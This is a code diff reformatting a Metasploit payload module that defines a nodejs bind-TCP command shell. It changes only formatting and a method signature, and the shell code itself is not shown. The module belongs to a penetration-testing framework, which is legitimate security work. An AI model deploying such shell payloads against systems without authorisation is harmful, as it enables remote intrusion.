@@ -7,9 +7,7 @@
 # differ so greatly when it comes to require() paths for net modules, we will
 # settle for just getting shells on nodejs.
 
-
 module MetasploitModule
-
   CachedSize = 555
 
   include Msf::Payload::Single
@@ -17,24 +15,27 @@ module MetasploitModule
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Command Shell, Bind TCP (via nodejs)',
-      'Description'   => 'Creates an interactive shell via nodejs',
-      'Author'        => ['joev'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'nodejs',
-      'Arch'          => ARCH_NODEJS,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'nodejs',
-      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Command Shell, Bind TCP (via nodejs)',
+        'Description' => 'Creates an interactive shell via nodejs',
+        'Author' => ['joev'],
+        'License' => BSD_LICENSE,
+        'Platform' => 'nodejs',
+        'Arch' => ARCH_NODEJS,
+        'Handler' => Msf::Handler::BindTcp,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'nodejs',
+        'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+      )
+    )
   end
 
   #
   # Constructs the payload
   #
-  def generate
+  def generate(_opts = {})
     super + command_string
   end
 
